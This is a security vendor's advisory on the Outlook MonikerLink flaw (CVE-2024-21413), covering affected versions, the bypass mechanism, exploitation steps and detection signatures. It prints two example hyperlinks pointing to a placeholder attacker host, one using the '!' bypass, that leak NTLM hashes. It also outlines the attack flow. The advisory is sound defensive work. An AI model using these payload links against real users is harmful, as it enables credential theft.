Microsoft Outlook Remote Code Execution Vulnerability
Overview
SonicWall Capture Labs Threat Research Team became aware of the MonikerLink Remote Code Execution vulnerability (CVE-2024-21413) in Microsoft Outlook, assessed its impact and developed mitigation measures for the vulnerability.
Microsoft Outlook is a globally acclaimed personal information management software from Microsoft. A MonikerLink vulnerability was observed in the Microsoft Outlook email client. The flaw arises in how Outlook handles specific hyperlinks, allowing remote attackers to execute arbitrary code on the victim’s system. Threat actors can bypass Outlook’s security protocols by manipulating the URL linked with the hyperlink, leading it to take control of the victim’s system or gain unauthorized access.
Product Versions Impacted
A list of all impacted product versions:
- Microsoft Office 2016 (64-bit edition)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office LTSC 2021 for 32-bit editions
- Microsoft Office LTSC 2021 for 64-bit editions
- Microsoft 365 Apps for Enterprise for 64-bit Systems
- Microsoft 365 Apps for Enterprise for 32-bit Systems
- Microsoft Office 2019 for 64-bit editions
- Microsoft Office 2019 for 32-bit editions
CVE Details
This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-21413.
The CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
- Attack vector is network.
- Attack complexity is low.
- Privileges required is none.
- User interaction is none.
- Scope is unchanged.
- Impact of this vulnerability on data confidentiality is high.
- Impact of this vulnerability on data integrity is high.
- Impact of this vulnerability on data availability is high.
Technical Overview
This vulnerability, dubbed as the “MonikerLink bug,” misuses the Component Object Model (COM) of Windows, leading to a local New Technology LAN Manager (NTLM) credential leak and the possibility of remote code execution. The threat actors can leverage CVE-2024-21413 to execute the arbitrary code by circumventing the security protocols of the email client. Security measures such as DKIM (DomainKeys Identified Mail), DMARC (Domain-based message authentication, Reporting and Conformance) and SPF (Sender Policy Framework) that are designed to eradicate issues like spoofing, forged addresses and more are part of SMTP authentication. This flaw uses SMTP authentication to ensure the bypassing and circumvention of email security mechanisms.
Microsoft Outlook can parse hyperlinks such as HTTP/HTTPS. Furthermore, Outlook does have its own security mechanisms, like “Protected View” and “Preview Pane” while handling emails specifically with attachments or hyperlinks. With its security features, it either displays a warning message or prompt with a security warning when applications other than HTTP/HTTPS are triggered as shown in Figure 1.
Figure 1: Outlook’s Protected View Security Warning
The “Protected View” feature usually blocks macros and is more prompted when the emails are from outside an organization.
Basically, Moniker is a COM object that is used to create instances or other objects. It can be implemented as an object or link one document to another when using various COM-based functions. When using a common protocol file:// moniker link into a hyperlink, the user can instruct Outlook to access a file over the network, wherein SMB protocol will be used involving local NTLM authentication.
<p><a href=”file://ATTACKER_IP/test”>CVE-2024-21413</a></p>
A simple tweak like using a special character such as “!” and additional text in the above moniker link leads to triggering this vulnerability.
Triggering the Vulnerability
Triggering this NTLM leak vulnerability in Microsoft Outlook requires a specially crafted Moniker Link to bypass Outlook’s Protected View. CVE-2024-21413 exploits the MkParseDisplayName API, a function that parses a human-readable name into a moniker that can be used to identify a link source. The moniker can be as simple as file:// moniker. The vulnerability can be triggered by modifying the hyperlink with the “!” special character and additional text in the Moniker Link below:
<p><a href=”file://ATTACKER_IP/test!exploit”>CVE-2024-21413</a></p>
This bypasses Outlook’s Protected View and leads to an authentication attempt via SMB protocol, sending the victim’s Windows netNTLMv2 hash to the attacker. This event of 1-click RCE is demonstrated in Figure 2.
Figure 2: One-click RCE
Exploitation
While exploiting this vulnerability, the crucial part is the click by the victim on the malicious hyperlink sent over email. There has been a PoC update that doesn’t require user interaction at all to exploit this vulnerability making it a 0-click NTLM leak.
In the demonstration part, Outlook does prompt a warning box, but it is not much of the issue part.
Figure 3: Outlook Tested Version
The exploit demonstrated in Figure 2 follows a series of steps in a fraction of time:
- A script that sends a malicious email to the victim’s email client through the attacker’s email client.
- Setting up an SMB listener and running the PoC
- Victims click on the specially crafted link received over email.
- Capture the hash and login of the victim (without the warning prompt on the affected Outlook version)
SonicWall Protections
To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
- IPS:4305 Microsoft Outlook MONIKERLINK Security Feature Bypass
- IPS:4307 Microsoft Outlook MONIKERLINK Security Feature Bypass 2
Remediation Recommendations
Considering the severe consequences of this vulnerability, the users of affected products are strongly encouraged to apply the patches as published in the vendor advisory.
Relevant Links
